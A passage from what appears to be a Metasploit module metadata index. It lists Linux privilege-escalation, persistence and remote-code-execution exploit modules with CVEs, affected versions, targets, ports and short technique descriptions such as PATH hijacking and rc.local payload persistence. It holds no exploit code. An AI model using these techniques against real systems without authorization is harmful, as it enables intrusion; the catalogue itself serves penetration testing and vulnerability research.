"description": "A race condition flaw was found in the PolicyKit pkexec utility and polkitd\n daemon. A local user could use this flaw to appear as a privileged user to\n pkexec, allowing them to execute arbitrary commands as root by running\n those commands with pkexec.\n\n Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu\n libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10), 0.96-2ubuntu0.1\n (10.04 LTS) and 0.94-1ubuntu1.1 (9.10).",
"references": [
"CVE-2011-1485",
"EDB-17942",
"OSVDB-72261"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/pkexec.rb",
"is_install_path": true,
"ref_name": "linux/local/pkexec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/rc_local_persistence": {
"name": "rc.local Persistence",
"full_name": "exploit/linux/local/rc_local_persistence",
"rank": 600,
"disclosure_date": "1980-10-01",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will edit /etc/rc.local in order to persist a payload;\n the session therefore needs write access to /etc/rc.local.\n The payload will be executed on the next reboot.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/linux/local/rc_local_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/rc_local_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/rds_priv_esc": {
"name": "Reliable Datagram Sockets (RDS) Privilege Escalation",
"full_name": "exploit/linux/local/rds_priv_esc",
"rank": 500,
"disclosure_date": "2010-10-20",
"type": "exploit",
"author": [
"Dan Rosenberg",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the rds_page_copy_user function\n in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n to execute code as root (CVE-2010-3904).\n\n This module has been tested successfully on Fedora 13 (i686) with\n kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\n with kernel version 2.6.32-21-generic.",
"references": [
"EDB-15285",
"CVE-2010-3904",
"BID-44219",
"URL-https://securitytracker.com/id?1024613",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f",
"URL-http://vulnfactory.org/exploits/rds-fail.c",
"URL-http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/",
"URL-http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/rds_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/rds_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"rds-fail.c"
]
}
},
"exploit_linux/local/recvmmsg_priv_esc": {
"name": "Linux Kernel recvmmsg Privilege Escalation",
"full_name": "exploit/linux/local/recvmmsg_priv_esc",
"rank": 400,
"disclosure_date": "2014-02-02",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"rebel"
],
"description": "This module attempts to exploit CVE-2014-0038, by sending a recvmmsg\n system call with a crafted timeout pointer parameter to gain root.\n\n This exploit has offsets for 3 Ubuntu 13 kernels:\n 3.8.0-19-generic (13.04 default);\n 3.11.0-12-generic (13.10 default);\n 3.11.0-15-generic (13.10).\n\n This exploit may take up to 13 minutes to run due to a decrementing\n (1/sec) pointer which starts at 0xff*3 (765 seconds)",
"references": [
"BID-65255",
"CVE-2014-0038",
"EDB-31347",
"EDB-31346",
"URL-https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2018-12-16 14:11:54 +0000",
"path": "/modules/exploits/linux/local/recvmmsg_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/recvmmsg_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/service_persistence": {
"name": "Service Persistence",
"full_name": "exploit/linux/local/service_persistence",
"rank": 600,
"disclosure_date": "1983-01-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Cale Black"
],
"description": "This module will create a service on the box, and mark it for auto-restart.\n The session needs enough access to write service files and, potentially, to restart services.\n Targets:\n System V:\n CentOS <= 5\n Debian <= 6\n Kali 2.0\n Ubuntu <= 9.04\n Upstart:\n CentOS 6\n Fedora >= 9, < 15\n Ubuntu >= 9.10, <= 14.10\n systemd:\n CentOS 7\n Debian >= 7, <=8\n Fedora >= 15\n Ubuntu >= 15.04\n Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto",
"System V",
"Upstart",
"systemd",
"systemd user"
],
"mod_time": "2019-03-06 00:07:17 +0000",
"path": "/modules/exploits/linux/local/service_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/service_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/sock_sendpage": {
"name": "Linux Kernel Sendpage Local Privilege Escalation",
"full_name": "exploit/linux/local/sock_sendpage",
"rank": 500,
"disclosure_date": "2009-08-13",
"type": "exploit",
"author": [
"Tavis Ormandy",
"Julien Tinnes <julien at cr0.org>",
"spender",
"rcvalle",
"egypt <egypt@metasploit.com>"
],
"description": "The Linux kernel failed to properly initialize some entries in the\n proto_ops struct for several protocols, leading to NULL being\n dereferenced and used as a function pointer. By using mmap(2) to map\n page 0, an attacker can execute arbitrary code in the context of the\n kernel.\n\n Several public exploits exist for this vulnerability, including\n spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c.\n\n All Linux 2.4/2.6 versions since May 2001 are believed to be affected:\n 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4\n\n This module has been tested successfully on CentOS 5.0 (i386) with\n kernel version 2.6.18-8.1.1.tl5; and Debian 3.1r8 Sarge (i686) with\n kernel version 2.4.27-3-386.",
"references": [
"CVE-2009-2692",
"EDB-9545",
"EDB-9641",
"BID-36038",
"URL-https://www.securityfocus.com/archive/1/505751",
"URL-http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86"
],
"mod_time": "2018-11-11 09:37:56 +0000",
"path": "/modules/exploits/linux/local/sock_sendpage.rb",
"is_install_path": true,
"ref_name": "linux/local/sock_sendpage",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/sophos_wpa_clear_keys": {
"name": "Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation",
"full_name": "exploit/linux/local/sophos_wpa_clear_keys",
"rank": 600,
"disclosure_date": "2013-09-06",
"type": "exploit",
"author": [
"Francisco Falcon",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a command injection on the clear_keys.pl perl script, installed with the\n Sophos Web Protection Appliance, to escalate privileges from the \"spiderman\" user to \"root\".\n This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection\n Appliance web ui, executed by the \"spiderman\" user. This module has been tested successfully\n on Sophos Virtual Web Appliance 3.7.0.",
"references": [
"CVE-2013-4984",
"OSVDB-97028",
"BID-62265",
"URL-http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/sophos_wpa_clear_keys.rb",
"is_install_path": true,
"ref_name": "linux/local/sophos_wpa_clear_keys",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/systemtap_modprobe_options_priv_esc": {
"name": "SystemTap MODPROBE_OPTIONS Privilege Escalation",
"full_name": "exploit/linux/local/systemtap_modprobe_options_priv_esc",
"rank": 600,
"disclosure_date": "2010-11-17",
"type": "exploit",
"author": [
"Tavis Ormandy",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges by exploiting a\n vulnerability in the `staprun` executable included with SystemTap\n version 1.3.\n\n The `staprun` executable does not clear environment variables prior to\n executing `modprobe`, allowing an arbitrary configuration file to be\n specified in the `MODPROBE_OPTIONS` environment variable, resulting\n in arbitrary command execution with root privileges.\n\n This module has been tested successfully on:\n\n systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and\n systemtap 1.1-3.el5 on RHEL 5.5 (x64).",
"references": [
"BID-44914",
"CVE-2010-4170",
"EDB-15620",
"URL-https://securitytracker.com/id?1024754",
"URL-https://access.redhat.com/security/cve/cve-2010-4170",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=653604",
"URL-https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html",
"URL-https://bugs.launchpad.net/bugs/677226",
"URL-https://www.debian.org/security/2011/dsa-2348"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-04-19 12:54:30 +0000",
"path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/udev_netlink": {
"name": "Linux udev Netlink Local Privilege Escalation",
"full_name": "exploit/linux/local/udev_netlink",
"rank": 500,
"disclosure_date": "2009-04-16",
"type": "exploit",
"author": [
"kcope",
"Jon Oberheide",
"egypt <egypt@metasploit.com>"
],
"description": "Versions of udev < 1.4.1 do not verify that netlink messages are\n coming from the kernel. This allows local users to gain privileges by\n sending netlink messages from userland.",
"references": [
"CVE-2009-1185",
"OSVDB-53810",
"BID-34536"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/udev_netlink.rb",
"is_install_path": true,
"ref_name": "linux/local/udev_netlink",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/ueb_bpserverd_privesc": {
"name": "Unitrends Enterprise Backup bpserverd Privilege Escalation",
"full_name": "exploit/linux/local/ueb_bpserverd_privesc",
"rank": 600,
"disclosure_date": "2018-03-14",
"type": "exploit",
"author": [
"Cale Smith",
"Benny Husted",
"Jared Arave",
"h00die"
],
"description": "It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\n has an issue in which its authentication can be bypassed. A remote attacker could use this\n issue to execute arbitrary commands with root privilege on the target system.\n This is very similar to exploits/linux/misc/ueb9_bpserverd; however, it runs against\n localhost by dropping a python script on the local file system. Unitrends stopped\n bpserverd from listening remotely on version 10.",
"references": [
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/000005691",
"URL-http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html",
"EDB-44297",
"CVE-2018-6329"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"UEB <= 10.0"
],
"mod_time": "2018-11-27 21:18:05 +0000",
"path": "/modules/exploits/linux/local/ueb_bpserverd_privesc.rb",
"is_install_path": true,
"ref_name": "linux/local/ueb_bpserverd_privesc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/ufo_privilege_escalation": {
"name": "Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation",
"full_name": "exploit/linux/local/ufo_privilege_escalation",
"rank": 400,
"disclosure_date": "2017-08-10",
"type": "exploit",
"author": [
"Andrey Konovalov",
"h00die",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n UDP Fragmentation Offload (UFO).\n\n This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros\n based on Ubuntu, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled\n and SMAP disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on various Ubuntu and Linux\n Mint systems, including:\n\n Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;\n Ubuntu 16.04 4.8.0-53-generic;\n Linux Mint 17.3 4.4.0-89-generic;\n Linux Mint 18 4.8.0-58-generic",
"references": [
"CVE-2017-1000112",
"EDB-43418",
"BID-100262",
"URL-https://seclists.org/oss-sec/2017/q3/277",
"URL-https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa",
"URL-https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112",
"URL-https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/",
"URL-https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html",
"URL-https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112"
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/ufo_privilege_escalation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/vmware_alsa_config": {
"name": "VMware Workstation ALSA Config File Local Privilege Escalation",
"full_name": "exploit/linux/local/vmware_alsa_config",
"rank": 600,
"disclosure_date": "2017-05-22",
"type": "exploit",
"author": [
"Jann Horn",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in VMware Workstation Pro and\n Player on Linux which allows users to escalate their privileges by\n using an ALSA configuration file to load and execute a shared object\n as root when launching a virtual machine with an attached sound card.\n\n This module has been tested successfully on VMware Player version\n 12.5.0 on Debian Linux 8 Jessie.",
"references": [
"CVE-2017-4915",
"EDB-42045",
"BID-98566",
"URL-https://www.securitytracker.com/id/1038525",
"URL-https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9",
"URL-https://www.vmware.com/security/advisories/VMSA-2017-0009.html",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1142"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
"is_install_path": true,
"ref_name": "linux/local/vmware_alsa_config",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/vmware_mount": {
"name": "VMWare Setuid vmware-mount Unsafe popen(3)",
"full_name": "exploit/linux/local/vmware_mount",
"rank": 600,
"disclosure_date": "2013-08-22",
"type": "exploit",
"author": [
"Tavis Ormandy",
"egypt <egypt@metasploit.com>"
],
"description": "VMWare Workstation (up to and including 9.0.2 build-1031769)\n and Player have a setuid executable called vmware-mount that\n invokes lsb_release in the PATH with popen(3). Since PATH is\n user-controlled, and the default system shell on\n Debian-derived distributions does not drop privs, we can put\n an arbitrary payload in an executable called lsb_release and\n have vmware-mount happily execute it as root for us.",
"references": [
"CVE-2013-1662",
"OSVDB-96588",
"BID-61966",
"URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
"URL-http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-10 14:35:34 +0000",
"path": "/modules/exploits/linux/local/vmware_mount.rb",
"is_install_path": true,
"ref_name": "linux/local/vmware_mount",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/yum_package_manager_persistence": {
"name": "Yum Package Manager Persistence",
"full_name": "exploit/linux/local/yum_package_manager_persistence",
"rank": 600,
"disclosure_date": "2003-12-17",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used. No\n handler is run automatically, so you must configure an appropriate\n exploit/multi/handler to connect. The module modifies a yum plugin to\n launch a binary of choice. grep -rF 'enabled=1' /etc/yum/pluginconf.d/\n will show which plugins are currently enabled on the system.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-30 06:25:48 +0000",
"path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/yum_package_manager_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/zpanel_zsudo": {
"name": "ZPanel zsudo Local Privilege Escalation Exploit",
"full_name": "exploit/linux/local/zpanel_zsudo",
"rank": 600,
"disclosure_date": "2013-06-07",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the zsudo binary, installed with zpanel, to escalate\n privileges. In order to work, a session with access to zsudo on the sudoers\n configuration is needed. This module is useful for post exploitation of ZPanel\n vulnerabilities, where typically web server privileges are acquired, and this\n user is allowed to execute zsudo on the sudoers file.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd, x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Command payload",
"Linux x86"
],
"mod_time": "2018-10-10 14:39:07 +0000",
"path": "/modules/exploits/linux/local/zpanel_zsudo.rb",
"is_install_path": true,
"ref_name": "linux/local/zpanel_zsudo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/accellion_fta_mpipe2": {
"name": "Accellion FTA MPIPE2 Command Execution",
"full_name": "exploit/linux/misc/accellion_fta_mpipe2",
"rank": 600,
"disclosure_date": "2011-02-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a chain of vulnerabilities in the Accellion\n File Transfer appliance. This appliance exposes a UDP service on\n port 8812 that acts as a gateway to the internal communication bus.\n This service uses Blowfish encryption for authentication, but the\n appliance ships with two easy to guess default authentication keys.\n This module abuses the known default encryption keys to inject a\n message into the communication bus. In order to execute arbitrary\n commands on the remote appliance, a message is injected into the bus\n destined for the 'matchrep' service. This service exposes a function\n named 'insert_plugin_meta_info' which is vulnerable to an input\n validation flaw in a call to system(). This provides access to the\n 'soggycat' user account, which has sudo privileges to run the\n primary admin tool as root. These two flaws are fixed in update\n version FTA_8_0_562.",
"references": [
"OSVDB-71362",
"OSVDB-71363",
"URL-http://www.rapid7.com/security-center/advisories/R7-0039.jsp"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8812,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/accellion_fta_mpipe2.rb",
"is_install_path": true,
"ref_name": "linux/misc/accellion_fta_mpipe2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/asus_infosvr_auth_bypass_exec": {
"name": "ASUS infosvr Auth Bypass Command Execution",
"full_name": "exploit/linux/misc/asus_infosvr_auth_bypass_exec",
"rank": 600,
"disclosure_date": "2015-01-04",
"type": "exploit",
"author": [
"Friedrich Postelstorfer",
"jduck <jduck@metasploit.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an authentication bypass vulnerability in the\n infosvr service running on UDP port 9999 on various ASUS routers to\n execute arbitrary commands as root.\n\n This module launches the BusyBox Telnet daemon on the port specified\n in the TelnetPort option to gain an interactive remote shell.\n\n This module was tested successfully on an ASUS RT-N12E with firmware\n version 2.0.0.35.\n\n Numerous ASUS models are reportedly affected, but untested.",
"references": [
"CVE-2014-9583",
"EDB-35688",
"URL-https://github.com/jduck/asus-cmd"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9999,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/asus_infosvr_auth_bypass_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/drb_remote_codeexec": {
"name": "Distributed Ruby Remote Code Execution",
"full_name": "exploit/linux/misc/drb_remote_codeexec",
"rank": 600,
"disclosure_date": "2011-03-23",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits remote code execution vulnerabilities in dRuby.",
"references": [
"URL-http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html",
"URL-http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/",
"URL-http://bugkraut.de/posts/tainting"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8787,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Trap",
"Eval",
"Syscall"
],
"mod_time": "2017-11-30 10:51:02 +0000",
"path": "/modules/exploits/linux/misc/drb_remote_codeexec.rb",
"is_install_path": true,
"ref_name": "linux/misc/drb_remote_codeexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/gld_postfix": {
"name": "GLD (Greylisting Daemon) Postfix Buffer Overflow",
"full_name": "exploit/linux/misc/gld_postfix",
"rank": 400,
"disclosure_date": "2005-04-12",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the Salim Gasmi\n GLD <= 1.4 greylisting daemon for Postfix. By sending an\n overly long string the stack can be overwritten.",
"references": [
"CVE-2005-1099",
"OSVDB-15492",
"BID-13129",
"EDB-934"
],
"platform": "Linux",
"arch": "x86",
"rport": 2525,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RedHat Linux 7.0 (Guinness)"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/misc/gld_postfix.rb",
"is_install_path": true,
"ref_name": "linux/misc/gld_postfix",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hid_discoveryd_command_blink_on_unauth_rce": {
"name": "HID discoveryd command_blink_on Unauthenticated RCE",
"full_name": "exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce",
"rank": 600,
"disclosure_date": "2016-03-28",
"type": "exploit",
"author": [
"Ricky \"HeadlessZeke\" Lawshae",
"coldfusion39",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution\n vulnerability in the discoveryd service exposed by HID VertX and Edge\n door controllers.\n\n This module was tested successfully on a HID Edge model EH400\n with firmware version 2.3.1.603 (Build 04/23/2012).",
"references": [
"ZDI-16-223",
"URL-https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/",
"URL-http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html",
"URL-https://exfil.co/2016/05/09/exploring-the-hid-eh400/",
"URL-https://github.com/lixmk/Concierge",
"URL-https://github.com/coldfusion39/VertXploit"
],
"platform": "Linux",
"arch": "armle",
"rport": 4070,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/misc/hid_discoveryd_command_blink_on_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hikvision_rtsp_bof": {
"name": "Hikvision DVR RTSP Request Remote Code Execution",
"full_name": "exploit/linux/misc/hikvision_rtsp_bof",
"rank": 300,
"disclosure_date": "2014-11-19",
"type": "exploit",
"author": [
"Mark Schloesser <mark_schloesser@rapid7.com>"
],
"description": "This module exploits a buffer overflow in the RTSP request parsing\n code of Hikvision DVR appliances. The Hikvision DVR devices record\n video feeds of surveillance cameras and offer remote administration\n and playback of recorded footage.\n\n The vulnerability is present in several models / firmware versions\n but due to the available test device this module only supports\n the DS-7204 model.",
"references": [
"CVE-2014-4880",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
],
"platform": "Linux",
"arch": "armle",
"rport": 554,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DS-7204 Firmware V2.2.10 build 131009",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/hikvision_rtsp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_data_protector_cmd_exec": {
"name": "HP Data Protector 6 EXEC_CMD Remote Code Execution",
"full_name": "exploit/linux/misc/hp_data_protector_cmd_exec",
"rank": 600,
"disclosure_date": "2011-02-07",
"type": "exploit",
"author": [
"ch0ks",
"c4an",
"wireghoul",
"Javier Ignacio"
],
"description": "This exploit abuses a vulnerability in the HP Data Protector service. This\n flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD\n command and traverse back to /bin/sh; this allows arbitrary remote code\n execution under the context of root.",
"references": [
"CVE-2011-0923",
"OSVDB-72526",
"ZDI-11-055",
"URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux",
"URL-https://community.rapid7.com/thread/2253"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.10/6.11/6.20 on Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_data_protector_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_jetdirect_path_traversal": {
"name": "HP Jetdirect Path Traversal Arbitrary Code Execution",
"full_name": "exploit/linux/misc/hp_jetdirect_path_traversal",
"rank": 300,
"disclosure_date": "2017-04-05",
"type": "exploit",
"author": [
"Jacob Baines",
"Matthew Kienow <matthew_kienow[AT]rapid7.com>"
],
"description": "The module exploits a path traversal via Jetdirect to gain arbitrary code execution by\n writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer\n is restarted using SNMP. Impacted printers:\n HP PageWide Managed MFP P57750dw\n HP PageWide Managed P55250dw\n HP PageWide Pro MFP 577z\n HP PageWide Pro 552dw\n HP PageWide Pro MFP 577dw\n HP PageWide Pro MFP 477dw\n HP PageWide Pro 452dw\n HP PageWide Pro MFP 477dn\n HP PageWide Pro 452dn\n HP PageWide MFP 377dw\n HP PageWide 352dw\n HP OfficeJet Pro 8730 All-in-One Printer\n HP OfficeJet Pro 8740 All-in-One Printer\n HP OfficeJet Pro 8210 Printer\n HP OfficeJet Pro 8216 Printer\n HP OfficeJet Pro 8218 Printer\n\n Please read the module documentation regarding the possibility for leaving an\n unauthenticated telnetd service running as a side effect of this exploit.",
"references": [
"CVE-2017-2741",
"URL-https://support.hp.com/lt-en/document/c05462914",
"URL-http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix (In-Memory)"
],
"mod_time": "2018-08-23 15:50:41 +0000",
"path": "/modules/exploits/linux/misc/hp_jetdirect_path_traversal.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_jetdirect_path_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_nnmi_pmd_bof": {
"name": "HP Network Node Manager I PMD Buffer Overflow",
"full_name": "exploit/linux/misc/hp_nnmi_pmd_bof",
"rank": 300,
"disclosure_date": "2014-09-09",
"type": "exploit",
"author": [
"d(-_-)b",
"juan vazquez <juan.vazquez@metasploit.com>"
],
